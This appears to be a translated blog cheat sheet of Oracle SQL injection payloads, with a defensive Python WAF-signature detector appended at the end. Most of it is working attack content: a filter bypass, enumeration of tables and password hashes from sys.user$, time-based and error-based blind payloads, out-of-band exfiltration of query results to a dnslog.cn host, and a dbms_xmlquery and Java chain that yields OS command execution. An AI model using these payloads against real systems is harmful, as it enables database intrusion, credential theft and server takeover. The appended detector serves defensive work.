Oracle Injection Tips / 1

https://y4er.com/post/oracle-sql-inject/

I. Oracle bypasses

1. '%7c%7c(case+when+instr(user,'S',2)>0+%0a/**/then+'lyx'+else+'0'+end)%7c%7c' : the filter is bypassed by combining %0a or %0d with the /**/ comment marker.

Follow-up thoughts:
1. Fuzzing functions
The blacklist matching can be fuzzed by wrapping function names between slashes (/.../). For example, /substr/ produced an error for me.


Damn, this one doesn't work.


2. How to query the contents of the user field
This requires string operations. I found the following methods (to be supplemented): 1. substr, substring 2. like 3. instr 4. replace

1. substr(string, start_position, [length]) returns a substring
Example: substr('This is a test', 6, 2) would return 'is'


2. like
when+user+like'H%25'+%0
Fuzz the H position as a placeholder.

3. Usage of instr. This involves running a script that substitutes the parameters (it is more efficient than like).
Syntax: instr(sourceString, destString, start, appearPosition), i.e. instr('source string', 'target string', 'start position', 'nth occurrence')
For example, if the username is HSCON:
    1.
instr(user,'H',1)=1
instr(user,'S',2)=2

    2.
instr(user,'HS',1)=1
instr(user,'HSC',1)=1

4. replace
replace('string to modify', 'substring to be replaced', 'replacement string')
Example: select replace('111222333444','222','888') from dual;
The output is '111888333444', so a correct execution returns 1

3. Getting more information about the database

Get the table_name column from the user_tables table:
select wm_concat(table_name) from user_tables
(select wm_concat(table_name ) from user_tables where rownum=1 and table_name not in('USERS'))

Get the column_name column from the user_tab_columns table:
select wm_concat(column_name) from user_tab_columns where table_name= 'USERS'
Get the database version:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT version FROM v$instance;

Get the operating system version:
SELECT banner FROM v$version where banner like 'TNS%';

Get the current database user:
SELECT user FROM dual;

Get the current user's privileges:
SELECT * FROM session_privs;

Get the passwords of all database users:
SELECT name, spare4 FROM sys.user$;

Get the usernames and passwords from the USERS table:
select wm_concat(username||'~'||password) from USERS

List DBA accounts:


Get the DB file paths:
SELECT name FROM V$DATAFILE;

II. Types of blind injection

Time-based blind injection

Statement 1: when the condition is true, it delays about 10 seconds and returns 1:

select 1 from dual where DBMS_PIPE.RECEIVE_MESSAGE('olo', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;


Statement 2: when the condition is true, it delays about 10 seconds and returns 1:

select decode(substr(user,1,1),'S',dbms_pipe.receive_message('olo',10),0) from dual;

Statement 3: when the condition is true, it delays about 10 seconds and returns 1:

select 1 from dual where 1=0 or DBMS_PIPE.RECEIVE_MESSAGE('pyy', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;

Error-based injection:

ctxsys.drithsx.sn() function:

select ctxsys.drithsx.sn(1, (select user from dual)) from dual;

ctxsys.ctx_report.token_type() function:

select ctxsys.ctx_report.token_type((select user from dual), '1') from dual;

xmltype() function:

select xmltype('<:'||(select user from dual)||'>') from dual;

dbms_xdb_version.checkin() function:

select dbms_xdb_version.checkin((select user from dual)) from dual;

dbms_xdb_version.makeversioned() function:

select dbms_xdb_version.makeversioned((select user from dual)) from dual;

dbms_xdb_version.uncheckout() function:

select dbms_xdb_version.uncheckout((select user from dual)) from dual;

dbms_utility.sqlid_to_sqlhash() function:

SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

ordsys.ord_dicom.getmappingxpath() function:

select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;

utl_inaddr.get_host_name() function:

select utl_inaddr.get_host_name((select user from dual)) from dual;

utl_inaddr.get_host_address() function:

select utl_inaddr.get_host_address('~'||(select user from dual)||'~') from dual;

Out-of-band channels (OOB):

An alternative channel, other than the normal one, is used to request server resources. Typically Oracle is made to send an HTTP or DNS request that carries the query result, and the HTTP and DNS logs of an external server are then monitored to read the result of the SQL query. This turns tedious blind injection into a way of obtaining query results directly, and is a large speedup over time-based blind injection in particular.

utl_http.request() function:

SELECT UTL_HTTP.REQUEST((select user from dual)||'.xxxxx.dnslog.cn') FROM DUAL;

utl_inaddr.get_host_address() function: (screenshot needs re-redacting)

select utl_inaddr.get_host_address((select user from dual)||'.xxxxxx.dnslog.cn') from dual;

sys.dbms_ldap.init() function:

select dbms_ldap.init('xxxxxx.dnslog.cn',80) from dual;

httpuritype() function:

select httpuritype((select user from dual)||'.xxxxxx.dnslog.cn').getclob() from dual;

Executing system commands:

select null,null from dual union select 1,dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function osshell(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

Run a system command:

select osshell('whoami') from dual;
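As an added defensive example (not part of the original post), the following Python normalizes request query strings the way a WAF or log-analysis rule should: it undoes the %0a/%0d plus /**/ evasion from section I and then matches the Oracle-specific function and object names listed in sections I.3 and II (time-based, error-based, OOB, enumeration and the dbms_xmlquery/Java chain). The sample query strings, the signature group labels and the function names normalize, classify and scan are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signature groups keyed to the techniques described above: each pattern is a
# function or object name that ordinary application SQL almost never sends.
SIGNATURES = {
    "time_based":   r"dbms_pipe\s*\.\s*receive_message",
    "error_based":  r"ctxsys\.(drithsx\.sn|ctx_report\.token_type)|xmltype\s*\(|"
                    r"dbms_xdb_version\.|dbms_utility\.sqlid_to_sqlhash|"
                    r"ordsys\.ord_dicom|utl_inaddr\.get_host_",
    "oob":          r"utl_http\.request|httpuritype\s*\(|dbms_ldap\.init|dnslog\.cn",
    "enumeration":  r"wm_concat\s*\(|user_tab_columns|user_tables|v\$version|"
                    r"v\$instance|sys\.user\$|session_privs|v\$datafile",
    "java_rce":     r"dbms_xmlquery\.newcontext|dbms_java\.grant_permission|"
                    r"compile java source",
    "string_probe": r"\b(instr|substr)\s*\(\s*user\b|\buser\s+like\b",
}

def normalize(raw: str) -> str:
    """Undo the evasions from section I: URL-decode until stable (double encoding
    is common), drop /**/ comments, and collapse CR/LF/tab/space runs so that
    '%0a/**/then' becomes ' then' before any signature is applied."""
    s = raw
    for _ in range(3):                      # bounded decode loop
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # strip inline comments
    s = re.sub(r"[\s\x00]+", " ", s)               # %0a, %0d, %09, NUL -> space
    return s.lower().strip()

def classify(raw: str) -> list[str]:
    """Names of every signature group that matches the normalized input."""
    text = normalize(raw)
    return [name for name, pat in SIGNATURES.items() if re.search(pat, text)]

# Constructed sample query strings (not real traffic); the first three reuse the
# payload shapes shown in the post, the last one is benign.
SAMPLE_QUERIES = [
    "id=1'%7c%7c(case+when+instr(user,'S',2)>0+%0a/**/then+'lyx'+else+'0'+end)%7c%7c'",
    "id=1+and+DBMS_PIPE.RECEIVE_MESSAGE('olo',10)=1",
    "id=1+union+select+UTL_HTTP.REQUEST((select+user+from+dual)%7c%7c'.x.dnslog.cn')+from+dual",
    "id=42&sort=name",
]

def scan(queries: list[str]) -> dict[str, list[str]]:
    """Map each query string to its matched groups; benign input maps to []."""
    return {q: classify(q) for q in queries}
```

Running scan(SAMPLE_QUERIES) flags the first three entries and returns [] for the benign one; the point is that the signatures must see the normalized text, because a blacklist applied to the raw line misses the %0a/**/ variant entirely.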